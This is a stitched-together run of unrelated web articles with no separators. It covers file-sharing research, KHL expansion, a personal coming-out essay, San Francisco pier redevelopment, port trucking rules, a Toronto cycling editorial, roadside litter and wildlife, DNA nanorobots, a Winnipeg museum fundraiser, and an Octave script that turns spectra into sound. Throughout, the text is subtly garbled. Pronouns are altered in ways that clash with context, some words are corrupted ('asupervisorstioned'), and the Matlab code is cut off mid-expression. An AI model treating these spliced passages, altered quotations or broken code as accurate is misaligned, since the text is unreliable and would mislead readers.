“ I ca n't go through all the gamut of issues , but I will say that broadly Mr. Trump appeals to working people , ” Guzman said in the interview .
“ I know there are strong emotions out there , but I hope people can look past emotions and think about specifics , ” Guzman also said . “ And also remember in this country we are free to choose our political candidates . ”
Michigan State is famous , of course , for blatantly discriminating against male students by maintaining a taxpayer-funded women 's study lounge in its main student union — in which male students could not trespass . ( RELATED : 2016 : Michigan State University Faces Civil Rights Complaint Over WOMEN-ONLY Lounge In Student Union )
Follow Eric on Twitter . Like Eric on Facebook . Send education-related story tips to erico @ dailycaller.com .
New Study Shows Legal Music Services -- Not Fear Of Harsh Copyright Laws -- Reduce Illegal File Sharing
from the how-many-times-do-we-need-to-say-it ? dept
The copyright industries seem to have only one tool in their tool box for addressing unauthorized file sharing : a legal hammer . But no matter how harsh the measure , the file sharing goes on , and so the maximalists call for even more disproportionate laws , which will doubtless be ignored in their turn . This is particularly frustrating , because we already know how to stop people downloading stuff : just offer good services at fair prices . When you do so , illegal file sharing drops dramatically , as Techdirt has noted time and again . Here 's yet more research confirming that fact , from a group at Lund University in Sweden : Survey responses from around 4,000 individuals suggest that the number of active file-sharers has dropped in the past two years . Those who share files daily or almost daily has decreased from 32.8 percent in 2012 to 29 percent in 2014 . According to the head of the research group , this is why the numbers are dropping , as reported by TorrentFreak : `` If you listen to what young people themselves are saying , it is new and better legal services that have caused the decrease in file-sharing , rather than respect for the law . There has been a trend where alternative legal solutions such as Spotify and Netflix are changing consumption patterns among young people . '' Particularly striking is the following statistic : Interestingly , in that same four-year period , the percentage of young people who said they believe that people should not share files because it is illegal dropped from 24 percent to 16.9 percent . So , even while young people are sharing files less often , their acceptance of the standards presented by the law appears to be dropping too . In other words , we need not only more good-quality services , but also copyright reform to bring the law into line with today 's views .
Follow me @ glynmoody on Twitter or identi.ca , and +glynmoody on Google+
Filed Under : authorized services , file sharing , survey , sweden
The KHL had a deadline for prospective teams to submit applications for the 2011-12 season , and this year 's has come with only one applicant : Lev Poprad , the Slovak team that tried to join last year . KHL President Alexander Medvedev confirmed this to Sport-Express , which was picked up by various Slovak news sources . While the KHL has been looking at expanding on several fronts in recent years , the Slovakian entry is perhaps their most bold of plans : they 're entering a country with a well established national league and one of the major powers of the international hockey scene , and for the first time adding a country that was not part of the USSR . Slovakia would become the fifth country represented in the KHL , joining Kazakhstan , Belarus , Latvia and Russia . Also of note , Poprad is preparing to enter a team in the MHL , the U22 circuit of the KHL .
The details of the bid are n't fully known , but the club has remained active even without a league to play in or any players . Their official website recently ran a timeline of the club , and by the sounds of things they plan on targeting both Czech and Slovak players if they are approved . The club has no association with HK Propad , a team in the Slovak Extraliga , although they 'd have to play out of their arena , a 4500-5000 seater which is on the small side for the KHL . The arena issue could be a problem , and the size of the city ( 55,000 ) does n't leave much room for growth .
It 's no slam dunk that this thing gets through , although there 's a lot of enthusiasm from the people behind the prospective club and from Medvedev . The KHL is running into financial problems in at least twomarkets , as the first article alluded to Vityaz Chekhov and Avtomoblist Yekaterinburg being situations Medvedev is currently overseeing . Chekhov currently has the smallest arena in the KHL , with a seating capacity of only 3300 , and the Tatravagonka Arena in Poprad would rank around the second smallest in the league .
I have my doubts about this particular team working out . The KHL requires a large budget and while I do n't doubt the passion of fans in northern Slovakia , I do doubt the sustainability of such a franchise . Teams in major cities like Riga , Astana and Minsk either barely break even financially or are money pits . The one thing a Poprad team would have on the others is that their revenue would be generated in Euros , which has a very favourable exchange rate to the Russian Ruble .
If this did go through , an interesting question must be asked : what effect will have a KHL and MHL team have on the development of Slovakian ( and Czech ) junior players ? Will this help stop the exodus of top players to the CHL , and consequently , how would this affect the drafting of players by the NHL out of Slovakia ?
By Brittany Chávez
Several authors—such as Joanne Fleisher , Mary A. Fischer , and Sherry Amatenstein—have written about women coming out later in life , after marriage and children . But what about those of us who married young and came out very shortly after ? The latter happens to be my story , and I think it 's time we start shifting public discourse to make room for these and other stories—to make room for radical revisions of self .
I grew up in a mostly liberal household , and my family make-up reminds me of the United Nations . However , I was also surrounded by heteronormativity—albeit implicitly . Additionally , I was the kid everyone loved to hate : I was in the Gifted and Talented Education Program from the second grade ; I had melted downs if I got into trouble ; I trained in professional ballet school on scholarships ; I took all Advanced Placement classes in high school ; and I was accepted into the top nursing school in California . I never had a boyfriend , did n't do drugs , and did not party . I did n't give my parents many problems . But I had eating disorders and depression , and I embraced a level of perfectionism that drove me to near insanity .
I also had a secret that no one knew . I had a variation of what could be called gender dysphoria ( the feeling of belonging to the wrong gender ) . I used to be very feminine with long flowing hair , and I was often described as beautiful , exotic , and elegant . Yet , at the age of five , I started feeling different from other girls . I felt masculine . This grew into very strong physical attractions for other young women along with strong emotional connections . As a result , it took me a very long time to even try dating men because I simply did n't want to .
Still , I 'm not your stereotypical butch lesbian . I have never played a sport in my life ; instead , I loved dolls , especially one gifted to me by and named after my grandmother Nanny Cash . I was also delicate and shy , and I spoke in soft tones . I was anything but aggressive . I wore dresses and skirts , and had long curly hair . I modeled and danced ballet , and later went on to dance salsa . How was this possible ? No one saw it coming .
Around the age of sixteen , I decided that if I did n't start acting like a heterosexual , people might start thinking things about me . As a result , I wound up in an abusive relationship that lasted for three years , further sending my self-worth into the pits . You see , unlike mainstream and pathopsychological constructed lesbians , I did n't have serious daddy problems . Even though my father—like most of my family—adhered to traditional gender roles , they were a stay-at-home dad , and was always there for us . The sweetest , kindest , and most gentle man I know , my father was a powerful force in my life .
The complexity came from within me .
In the asupervisorstioned abusive relationship , I was accused of being a “ liberal feminist ” and a “ lesbian ” countless times because I did n't cave to their every desire and demand . After I left the relationship , I spent three years with myself until I met my would-be husband . We had a huge Mexican wedding , and everyone on both sides of our families attended . When my now ex-husband saw me coming down the aisle , they cried . I loved them and cared for them very much , too , but I knew that I was not a straight woman . We were good friends , and that was the extent of it . When you marry , you marry a family , and I let so many people down by eventually asking for a divorce . I broke hearts , confused people , and undermined heterosexual masculinity and family in the process .
I 'm truly sad about the hearts I broke , but I could no longer keep up the façade . My whole universe started to crumble . I was emotionally and spiritually dying slowly , and I was severely depressed . I was living a lie and becoming aware of deeply suppressed feelings and desires , and it had to stop .
When I fell in love with a woman for the first time , while married , I made sense to myself for the first time . I no longer felt that I was n't feminine enough because I gave myself permission to stop trying . I was about to bust open all the societal norms I had formerly upheld . You see , you can grow up as feminine as I did and still come to express yourself as quite masculine . We just have to give ourselves permission to transform , and it is never too late .
I am , at my fullest self , a genderqueer-androgynous-masculine of center-butch-toppy person who loves women . By women , I mean that I am attracted to cis-gender women and find that my deepest emotional and spiritual partnerships have been with individuals who also identify as women . While I do not desire to transition physically , my gender is much more complex than any biological definition of womanhood . FEMALE masculinity is way more complicated than our society tends to acknowledge . My masculinity came from my body . For instance , the muscles I built dancing ballet and modern dance gave me a tremendous amount of space to express the strength and extreme virtuosity of my masculinity through movement . I had that outlet , and I was rock solid . When I stopped dancing , I felt very strange . I kept trying to find other ways to express this alternative form of masculinity , but I could n't find it . So , I suppressed it , and it cost me .
Throughout the “ straight ” version of my adult life , I took antidepressants , because I struggled desperately with wanting to be accepted by my family and communities . This lasted only a few years , until my love for women and my need to express my gender had to “ come out. ” But my coming out was actually more like a coming IN . I came IN to who I have always desired to be . I cut my hair in stages , got rid of all my dresses and heels ( unless they are costumes for my performance art ) , and started dressing in a combination of male and female clothing . When I wore any piece of clothing that felt “ too feminine , ” I felt sick with anxiety , and had to change clothes immediately . I completely altered my gender performance in a matter of months .
To some people who had known me before and after my gender transformation , my desire to express my internal gender feelings externally meant the end of our relationship . I have dealt with the worst shaming , bullying , and emotional turmoil in my life since “ coming in. ” I am often read as “ male ” or transgender , apparently doing neither correctly . Additionally , I tend to prefer gender neutral pronouns . This often instills a deep fear in some people that can lead to disgust and hatred .
Still , I sometimes have the privilege of passing as male and not being bothered . Other times , though , I fear for my safety when my gender ambiguity provokes distaste , bigotry , or hatred . Female public bathrooms also give me anxiety , because I 'm often perceived to be in the wrong place . There is everyday violence and fear that comes with gender and sexual non-conformity . Re-making ourselves means we have to live with the fact that there will be many who are not ready to accept what we have become . And no , it does n't necessarily “ get better . ”
I am unapologetically and radically queer . My body is political . As a performance artist , I am very comfortable in my own skin , but so few knows that this comfort is very new . This comfort was born of endless years of feeling awful , inadequate , and like something was permanently off-kilter . For me , queerness means freedom . Since coming in , I no longer compare my body to any other human—radical liberation from the heterosexual matrix of the gaze . Radical queerness meant remaking myself , proudly defending the consequences , and succumbing to no one . It means standing on the frontlines of the political struggles I believe in , and going to bat for my comrades . It means standing proud when others would call me an embarrassment . It means never starting a sentence with an apology . It means never dressing to prevent the stares . It means embracing the complexity of my pluri-positionality as a queer person/genderqueer/andro , of Afro/Latino/Euro/Cherokee heritage , and the most formally educated of my pack .
It means all of this and so much more . Standing within our rights to remake ourselves is still a radically political act today . And talking and writing about it will hopefully inspire others who feel they should do the same . No more apologies , no permission needed .
________________________________________________________
Brittany Chávez is a genderqueer transnational artist-scholar-activist based between North Carolina and México . They are currently a core troupe member of the internationally-renowned performance troupe La Pocha Nostra and a second year Ph.D. student at the University of North Carolina at Chapel Hill .
The Port of San Francisco has a problem it wants to turn into an opportunity — what to do with its alluring but crumbling finger piers .
The Beaux Arts bulkhead buildings along San Francisco 's waterfront are the perfect backdrop for the city 's revitalized waterfront , with their white stucco , red-tiled roofs and flow of cyclists , street cars and joggers passing by .
But behind the white stucco and red-tiled roofs is the Port of San Francisco 's billion-dollar problem : crumbling piers , rotting aprons , pier sheds that need more than $ 100 million in work to be made safe and usable .
With many of those historic piers in desperate need of repair , the port has decided to solicit ideas from developers or organizations with the resources , or even just the imagination , needed to take on the spectacular but challenging bayfront properties .
The solicitation , part of a larger ongoing waterfront plan update , will focus on eight piers that are either vacant or being used for storage or parking : 19 , 23 , 29 , 31 , 26 , 28 , 38 and 40 . Port Chief Operating Officer Byron Rhett called the approach similar to the process used for the historic buildings at Pier 70 , which resulted in interest from everything from a circus school to a winery .
Because the port wants to encourage creative concepts of all kinds , the ideas wo n't be limited to those “ trust consistent ” uses — those generally allowed under the state public trust rules . Those rules generally do n't allow housing or hotels , and require that any project have a balance of maritime and other uses , such as restaurants , retail and some office .
“ We are going to go out to the world and invite all kinds of ideas — trust consistent and others that are financially viable but are n't traditionally trust consistent , ” said Rhett . “ We want the development community to help us understand what the opportunities might be . ”
Michael Martin , the port 's deputy director of real estate , said the responses would help as the port works on an update of its 1997 waterfront plan .
“ It does n't serve anybody 's interest to develop a plan that does n't speak to realities of what can be done , ” Martin said .
Over the past 20 years the port has had a mixed record when it comes to reviving the former industrial piers , most of which have been underused since the 1960s and 1970s , when cargo business migrated to the Port of Oakland .
The successes are spectacular . The Ferry Building Market Place and AT & T Park both draw millions to the waterfront . The Justin Herman Cruise Terminal at Pier 27 has become a popular destination for cruise ships . The Exploratorium revived Pier 15 , while Pier 24 was converted into a photography center . Pacific Waterfront Partners , which redeveloped Pier 24 , also rehabbed Piers 1½ , 3 and 5 with a collection of restaurants , office space and a water taxi terminal .
But for every hard-fought victory , there are other projects that died , some because of opposition and some because of economics .
After five years of working on a plan to convert the 25,000-square-foot bulkhead at Pier 38 into office space and retail , in August developer TMG informed the port that it would not go forward with the plan .
Pier 38 has been vacant since 2011 , when the port evicted tenant Carl Ernst for violating the terms of their lease , including filling it with parking and tech startups instead of boat storage and maritime-related office space . They also failed to make safety improvements , so the port red-tagged the building .
TMG 's decision to give up was not surprising . The cost of getting the bulkhead buildings in usable condition jumped from $ 12 million in 2013 to $ 20 million today , Rhett said .
Rhett said that the port looked at ways to include a portion of the adjacent pier shed to make the project more financially attractive for TMG , but that nothing came of it .
“ The project just could n't absorb the additional costs , ” said Rhett . “ The more time we spent looking for ways to add value to the project the more costs started going up . The project just kept getting further and further away from us . ”
In other instances , politics have come into play .
Both Mills Corp. and Shorenstein Properties spent years , and millions of dollars , negotiating to take over 19 acres at Piers 27-31 . Both plans ultimately faltered because of neighborhood opposition .
Australian developer Lend Lease and the Golden State Warriors both abandoned plans to revive Piers 30-32 — Lend Lease because of the $ 155 million it would cost to fix the piers and the Warriors because of neighborhood resistance to putting a new basketball arena there .
In addition , San Francisco voters have made it clear that they do n't want to see the waterfront overdeveloped .
In 2014 , 59 percent of voters passed Proposition B , which restricts the height of new waterfront construction to current zoning limits unless voters approve an exception for a specific project .
Telegraph Hill neighborhood activist Jon Golinger , who led the Prop . B initiative , said they do n't have a problem with gathering ideas for new uses for the piers , but added that they would oppose any process that “ let developers drive what to build on the waterfront . ”
“ This just sounds like deja vu all over again , ” Golinger said . “ The port has aggressively tried to jam huge projects through and burned valuable money and valuable time with projects that failed . ”
Gabriel Metcalf , executive director of the urban think tank SPUR , said that they support the port 's call for pier reuse concepts .
“ It 's a good idea , now and then , to go out to the community and see if there are any great ideas that people have , ” they said . “ The worst thing that could happen is nobody has anything that works . But maybe they get lucky and turn up some creative ideas that are actually viable . ”
Developer Simon Snellgrove of Pacific Waterfront Partners , which developed Pier 24 and Piers 1½ , 3 and 5 , said they “ remains enthusiastic about the waterfront ” and would respond to the port 's call for ideas . Snellgrove said they continue to believe that one or two hotels or housing should be allowed on select piers .
“ The waterfront is fantastic , but there has to be an economic engine there that will pay the bills for the public to use it , ” they said .
David Polatnick , who was a real estate consultant for the Exploratorium on Pier 15 , said uncertainties about sea level rise and the waterfront plan update have made the port reluctant to commit to long-term leases , which makes rehabilitation projects tough to finance .
“ The up-front infrastructure costs are so expensive you need a long-term lease , or the numbers do n't work out , ” they said . “ These leaky sheds are romantic but very expensive to work on . You start with less than land . You have to work underwater . You have to watch the tides . You have to use scuba divers to work under the piers . ”
Meanwhile , the city 's piers continue to decay .
At Pier 38 , six years after the tech workers were ousted , the building remains eerily quiet . The green carpeting is stained with deposits from seagulls and other fowl , along with cast-off cabling and dust-covered workbenches , business cards and signage from forgotten startups . The windows on the north side of the property are boarded up to prevent squatters from getting in .
Yet the views are stunning : the water , the Bay Bridge , cargo ships passing on one side and street cars rattling by on the Embarcadero . It 's easy to see why many developers will be interested — even if failure is a distinct possibility .
“ What this building needs is a developer who has the experience , the money and the stomach to take on a project this big , ” said Elliot Riley , a senior property manager with the port .
Added to the urgency of shoring up the piers is the port 's looming $ 5 billion plan to upgrade the seawalls to protect against earthquakes and sea level rise , which will likely go to the ballot in 2018 .
Once that work starts , there may not be an opportunity to fix individual piers for quite a while , said SPUR 's Metcalf , who said the city needs to have an open mind about future occupation .
“ I think if we do n't open our thinking to a bigger range of uses , we will probably end up losing a lot of the piers , ” they added .
J.K. Dineen is a San Francisco Chronicle staff writer . Email : jdineen @ sfchronicle.com
Twitter : @ sfjkdineen
Facing unprecedented congestion at the ports of Los Angeles and Long Beach , the Harbor Trucking Association announced Thursday that it will seek an exemption from a federal mandate that regulates when truck drivers can work .
The association will petition the Federal Motor Carrier Safety Administration for an exemption to a provision requiring a 34-hour rest period for truckers , which would allow one of the largest marine terminal operators on the waterfront , Long Beach Container Terminal ( LBCT ) , to open its gates on Sundays to move backed-up cargo .
“ Something has to be done , ” said LBCT President Anthony Otto , whose terminal already is open Friday nights to improve goods flow . “ We need to move freight . ”
Under the federal mandate , truck drivers are allowed to work 70 hours within an eight-day period . They also must have two 1-5 a.m. off-duty periods during 34 consecutive hours of rest . Most drivers take that time off on Fridays and Saturdays , making it difficult for drivers to work on Sundays .
“ The same story I get from everyone is , ‘ I 'd love to come on Sunday , but I 've run out of hours , ' ” Otto said .
The exemption would give drivers more flexibility in their work schedule , said Alex Cherin , executive director of the Harbor Trucking Association , adding that the so-called restart provision applies more to long-haul truckers .
The petition process is expected to take 60 to 90 days .
Otto has proposed opening their terminal 's gates on Sundays once the petition is granted if there are enough trucks to justify being open .
The association 's petition and LBCT 's proposal to open on Sundays are the latest in a multipronged effort by the supply chain to move cargo clogged up within the nation 's two busiest seaports .
Customers have been complaining about delays in the delivery of goods due mostly to unresolved labor talks , the lack of available chassis , or trailers , to carry cargo , and the arrival of bigger vessels delivering larger quantities of goods .
The ports of Los Angeles and Long Beach have been in talks with stakeholders on how to resolve the chassis issue , which created congestion after carriers shifted the responsibility of providing chassis to a different operator , resulting in a critical shortage .
In a four-hour meeting with stakeholders last week , the Port of Los Angeles brought together three major chassis providers and a terminal operator — all of whom have the majority of chassis , more than 95,000 — and persuaded them to create a pool system to share them .
The providers — Direct ChassisLink Inc. , TRAC Intermodal , Flexi-Van and SSA Terminal — are expected to roll out the chassis pool by Feb. 1 . This week , they are hammering out the logistics of that rollout , including the selection of a third-party provider that could independently facilitate the process .
“ There 's a lot of work to do in this area , but I 'm encouraged that for the first time these three guys , plus SSA folks , were able to sit down and talk about this idea , ” Port of Los Angeles Executive Director Gene Seroka said Thursday . “ This is a significant step forward . ”
Meanwhile , Port of Long Beach Chief Jon Slangerup has proposed freeing up of more truck trailers by providing an area in the port where drivers could leave empty shipping containers for temporary storage while they retrieve loaded imports from Long Beach docks .
“ We are taking measures to ease congestion by freeing up more chassis , ” said Port of Long Beach Chief Commercial Officer Noel Hacegaba . “ The solutions that are being put into action will ease and speed cargo flow during the peak season . ”
Contact Karen Robes Meeks at 562-714-2088 .
Prohibiting cycling on Wychwood Ave. in response to a recent , tragic mishap makes as much sense as banning cars from a road after a fatal traffic accident . It makes none at all .
Yet that 's one option Councillor Denzil Minnan-Wong has floated in the wake of Joseph Mavec 's death earlier their month . Mavec , 47 , was cycling on Wychwood when their bike 's wheel jammed into a streetcar track , pitching them forward to the pavement .
The accident triggered an outcry , especially since this section of track had been out of service for decades . Some cycling advocates said it should have been torn up long ago . But the Toronto Transit Commission pointed out such removal requires extensive — and expensive — road reconstruction . It 's generally done only when a thoroughfare is due for repair . And simply paving over disused track could cause drainage and other problems .
Cycle Toronto , a biking advocacy group , wants the city to do a better job of warning people about streetcar dangers and has called for a comprehensive review of the safety hazard posed by Toronto 's tracks . That makes sense . A measure to have city staff conduct just such a review is to go before the public works committee next month .
In the meantime committee chair Minnan-Wong has come up with another idea : Forbid cycling on the road at Wychwood . That 's odd , coming from the city 's point man in promoting biking . They also suggested a possible parking ban there , to give cyclists more space .
No litter is safe litter ! No litter is safe litter !
Roadside litter has a devastating impact on wild animals . The Wildlife Center encourages you to remember “ the message of the apple core ” and share it with others .
The Apple Core Effect
Driving down the road , a passenger in a moving vehicle casually tosses an apple core out of their car window . This passenger thinks nothing of tossing out the mostly eaten food and might even feel a bit of self-congratulatory pride . “ It 's biodegradable , no harm done . Something will probably eat the rest of it , anyway . ”
Because it is biodegradable , the apple core does not have the same obvious ill-effects of some other litter items , such as a glass bottle or a candy wrapper . A bottle could break and cause injury to wild animals that walk through the dangerous shards of glass . An animal could ingest part of a candy wrapper , thinking it is food , and become ill .
An apple core wo n't physically injure an animal , like the broken glass bottle . It wo n't cause an animal to become sick , like a plastic candy wrapper . In fact , some people think , it might actually help a hungry animal who is searching for a meal .
The apple core is equally dangerous as any other type of litter because it WILL help a hungry animal find a meal – by the side of the road . Food items thrown from cars attract wild animals to the sides of roads , and roads are not a safe place for animals to be .
Wild animals do not understand the concept of cars , and they often will not or can not get out of the way quickly enough when a moving vehicle is headed their way .
Imagine an opossum , late at night , snacking on the discarded apple core , when a car turns the corner and hits the opossum . The driver never sees the nocturnal creature eating on the side of the road .
Or imagine a hawk , perched in a tree with their eyes locked on a squirrel nibbling on the apple core in the left lane . The hawk swoops down to snatch the squirrel and is struck by a car .
Each year , the Wildlife Center admits hundreds of patients – just like the opossum or hawk – that are hit by cars . Often , these animals were searching for food along the roadside when they were struck by a vehicle .
Food items and food or beverage containers should never be discarded on the side of the road . They will attract wild animals to a very dangerous place and put the animals at risk of being seriously injured or killed .
Please remember that no litter is “ safe ” litter , and share the message of the apple core .
NEW YORK , NY ( August 7 , 2013 ) — Researchers at Columbia University Medical Center , working with their collaborators at the Hospital for Special Surgery , have created a fleet of molecular `` robots '' that can home in on specific human cells and mark them for drug therapy or destruction .
The nanorobots—a collection of DNA molecules , some attached to antibodies —were designed to seek a specific set of human blood cells and attach a fluorescent tag to the cell surfaces . Details of the system were published July 28 , 2013 , in the online edition of Nature Nanotechnology .
`` This opens up the possibility of using such molecules to target , treat , or kill specific cells without affecting similar healthy cells , '' said the study 's senior investigator , Milan Stojanovic , PhD , associate professor of medicine and of biomedical engineering at Columbia University Medical Center . `` In our experiment , we tagged the cells with a fluorescent marker ; but we could replace that with a drug or with a toxin to kill the cell . ''
Though other DNA nanorobots have been designed to deliver drugs to cells , the advantage of Stojanovic 's fleet is its ability to distinguish cell populations that do not share a single distinctive feature .
Cells , including cancer cells , rarely possess a single , exclusive feature that sets them apart from all other cells . This makes it difficult to design drugs without side effects . Drugs can be designed to target cancer cells with a specific receptor , but healthy cells with the same receptor will also be targeted .
This graphic shows a molecular robot ( automaton ) in action . To tag cells ( grey circle ) that display the Mi , Mj , and Mk receptors , five different components of a molecular robot are deployed . Each of the first three components consists of DNA and an antibody ; one antibody binds to each receptor , bringing its DNA ( represented by the colored lines ) close together on the cell . The fourth DNA component , represented by the single red line , then initiates a chain reaction by pulling the red DNA strand away from the first antibody . That causes the blue DNA strand to change position , followed by the green DNA strand . In the final step , the last antibody pulls a fluorescent DNA strand ( labeled F ) from the fifth component , completing the action of the robot .
( Photo Credit : Milan Stojanovic , Ph.D./Columbia University Medical Center )
The only way to target cells more precisely is to identify cells based on a collection of features . `` If we look for the presence of five , six , or more proteins on the cell surface , we can be more selective , '' Dr. Stojanovic said . Large cell-sorting machines have the ability to identify cells based on multiple proteins , but until now , molecular therapeutics have not had that capability .
How It Works
Instead of building a single complex molecule to identify multiple features of a cell surface , Dr. Stojanovic and their colleagues at Columbia used a different , and potentially easier , approach based on multiple simple molecules , which together form a robot ( or automaton , as the authors prefer calling it ) .
To identify a cell possessing three specific surface proteins , Dr. Stojanovic first constructed three different components for molecular robots . Each component consisted of a piece of double-stranded DNA attached to an antibody specific to one of the surface proteins . When these components are added to a collection of cells , the antibody portions of the robot bind to their respective proteins ( in the figure , CD45 , CD3 , and CD8 ) and work in concert .
On cells where all three components are attached , a robot is functional and a fourth component ( labeled 0 below ) initiates a chain reaction among the DNA strands . Each component swaps a strand of DNA with another , until the end of the swap , when the last antibody obtains a strand of DNA that is fluorescently labeled .
At the end of the chain reaction—which takes less than 15 minutes in a sample of human blood—only cells with the three surface proteins are labeled with the fluorescent marker .
`` We have demonstrated our concept with blood cells because their surface proteins are well known , but in principle our molecules could be deployed anywhere in the body , '' Dr. Stojanovic said . In addition , the system can be expanded to identify four , five , or even more surface proteins .
Now the researchers must show that their molecular robots work in a living animal ; the next step will be experiments in mice .
Source : Columbia University Medical Center
Winnipeg 's Children 's Museum is trying out a new strategy to help raise cash — they 're inviting adults to party there at night .
`` People that are in their early 20s now , even pushing into their 30s , they remember coming to the Children 's Museum when they were younger , and they want to come back , '' said museum services co-ordinator , Mario Labossiere .
One of the Children 's Museum 's exhibits blasts air into the face of a young visitor . The museum is holding adults-only nights to raise money for underprivileged kids to visit the museum . ( Children 's Museum photograph courtesy of Ebonie Klassen Photography ) The museum has launched a series of events — dubbed Seriously Adult — which see the museum open to adults only after hours , and a bar is installed in the back in order to tap a market of people who are n't likely to hit up a fundraising gala or go to a golf tournament .
`` They just think it 's the coolest thing to be able to walk around with a drink in their hand and do all those fun things , '' said Labossiere . `` It 's not something you can say you do all the time . ''
So far , they 've hosted a trivia night , a comedy night and coming up — an indie night with local bands Mise en Scene , ATLAAS and French Press .
And adults are n't asked to stay off the exhibits — they 're encouraged to get in and play .
`` With our policies , we ca n't always allow unaccompanied adults into the museum for various safety reasons so having these after hours adult-only events gives us a lot of options , '' said Labossiere . `` They can play in the train . They can crawl up the Lasagna Lookout Tower . They can milk a cow , but then they can also listen to some music , hear some comedians ... and just have a great time . ''
And the idea is paying off . Each event raises between $ 5,000 and $ 7,500 dollars .
But organizers are hoping to get more for their next event .
`` We have a Free to Play access program , which brings under-supported children to the museum for free , and we really believe in making this place accessible to as many people as possible , '' said Lisa Dziedzic , the museum 's marketing director . `` It 's a huge amount of money that it takes to be able to fund that program . That 's why we do it . ''
Dziedzic hopes to raise enough money from Nov. 7 's indie night to bring 1,000 underprivileged kids to the museum .
Children 's Museum hit by funding cut
`` We 've had fundraising galas and special event dinners and golf tournaments , things like that , and we 're finding the rate of return on [ Seriously Adult events ] is actually been higher than we 've been able to do over the past number of years with those types of events , '' explained Dziedzic A careful counting system ensures every cap , bottle and cup are accounted for after the adults-only nights at the Children 's Museum . ( Curtis Shonoski ) fundraisingDziedzic
And the museum needs the cash . They generate 86 per cent of their own revenue from ticket sales and special events , with only 14 per cent coming from government funding .
Other local museums get a lot more .
`` As a children 's museum we do n't quite qualify for the same heritage or historical funding that lots of other institutions in the city can [ get ] '' said Dziedzic .
The museum also saw its funding cut last year , when the City of Winnipeg made across-the-board cuts to arts funding .
`` There 's cuts all over the place so it is a hard thing to try and rely on government funding to do , '' they said .
Massive clean-up , strict counts keep it safe
But there are risks with inviting adults into a children 's space to drink and play — the museum has to go through a massive cleanup before it can be reopened , and every cup , bottle and beer cap has to be counted so none go missing .
`` We scrub , and we pull apart things that are never pulled apart just to make sure that there is n't a bottle cap somewhere that should n't be there , '' said Labossiere .
All that so adults can splash in a water lab , take apart a jumbo Jenga set , clamber up and downplay structures or whiz down a kaleidoscope slide .
The hardest part , Labossiere and Dziedzic said , is trying to get the word out that the events are happening .
`` We 're still in the brainstorming part of it , '' said Labossiere . `` Some things have been working really stellar and some have not . ''
Working on a shoe-string budget and relying on volunteer services means they 're only able to put on a few of the events a year — but at least for now , the museum plans to keep hosting them to raise money for underprivileged kids .
The next Seriously Adult event at the Children 's Museum is on Nov. 7 . Mise en Scene , French Press and ATLAAS will all play sets . Tickets are $ 20 and doors open at 7:30 p.m .
[ hint : try using the keyboard letters and numbers ! ]
Video showing how to use the molecular sounds keyboard
How the molecular sounds were created
Molecules are groups of connected elemental atoms . The atoms share some of their electrical energy to form a bond with other atoms . The bonds have different energy depending on which the type of atom involved in the bond , the type of bond itself and the local electronic charge at the atom . Energy at the atomic level has a distinct orbital structure and electrons exist in quantum energy levels . When the bonds between the atoms absorb infra-red energy they vibrate . The absorption of the energy can be seen in an Fourier Transform infra-red spectrum as peaks at certain energy levels . A skilled Organic Chemist can look at the peak position and form and qualitatively determine certain characteristics of the molecule , for instance if the molecule is aromatic or aliphatic and the functional groups present such as alcohol , or amine groups .
A vibrating molecular bond is similar to the standing waveform string of plucked musical string or a struck drum head , in this case though energy is emitted and not absorbed and the energy is in the form of sound . The Fourier transform gives the exact frequency and amplitude of absorption of the bonds in the molecule , however this is not form in which audio information is processed by humans which is in the time/amplitude domain . If a Inverse Fourier transform is performed then the Fourier Transform infrared spectrum can be converted into the time/amplitude domain and the vibrations of the molecules heard .
Extracting audio from the molecular FTIR spectrum
The inverse Fourier transform requires the phase to be known in addition to the frequency and amplitude , which in the case of the infrared spectrum is unknown , we can however also reconstruct the audio signal by creating sine waves at the correct frequency and amplitude . The phase of the sine waves are unimportant since the waveform is unchanging over time and the human auditory system is unable to detect the phase of the signal providing the phase does not change in time . The Matlab/Octave algorithm below uses a algorithm to determine peak positions ( shown as red dots in the figure below ) from which sine waves are created and summed to give the audio signal . The molecules are ordered according to the weighted mean of the peaks determined in the spectrum , this gives an approximate increase in musical pitch from left to right across the keyboard .
The IR data is obtained from the Quantitative Infrared Database as a JCampDX file which can be read in Matlab or octave using the jcampread function .
About the Molecular Sounds Application
The Molecular Sounds application allows you to listen to the sounds of organic chemical molecules using a keyboard . When the key is pressed a sound of the molecule is played and the structure and FFT spectrum displayed . The keys are ordered like a piano or synthesizer and can be played simultaneously and using the computer keyboard .
FTIR spectrum of Ethyl tert-Butyl Ether : This is the frequency representation of the chemical from which the amplitude/time representation is derived
Computer Octave/Matlab code for infrared spectrum to audio conversion
% Matlab/Octave function to read a jcamp-dx file and create molecular audio sound function createMolecularSound ( filename ) % set up frequency parameters Fs = 8000 ; % samples per second dt = 1/Fs ; % seconds per sample StopTime = 5 ; % length of audio segment t = ( 0 : dt : StopTime-dt ) ' ; % time vector % read the FTIR file jcampStruct = jcampread ( filename ) ; % get the data data = jcampStruct.Blocks ( 1 ) ; X = data.XData ; Y = data.YData ; % find peaks in spectrum peaklist = SimplePeakFind ( 50 , Y , 1e-5 ) ; % plot peaks h=figure ; plot ( X , Y , X ( peaklist ) , Y ( peaklist ) , '' o '' , '' markersize '' ,5 , '' markerfacecolor '' , [ 1,0,0 ] ) ; % save the peak find plot saveas ( h , regexprep ( filename , '' .jdx '' , '' .jpg '' ) , 'jpg ' ) % create the frequencies sig = sum ( Y ( peaklist ) . * sin ( 2 * pi * X ( peaklist ) . * t ) ,2 ) ' ; % stats to determine data range sig ( sig > mean ( sig ) +2.5 * sqrt ( var ( sig ) ) ) =mean ( sig ) +2.5 * sqrt ( var ( sig ) ) ; sig ( sig % normalise data sig=sig/ ( 2.5 * sqrt ( var ( sig ) ) ) ; % save audio file wavwrite ( sig , Fs , regexprep ( filename , '' .jdx '' , '' .wav '' ) ) ; end
here is the simple peak find function
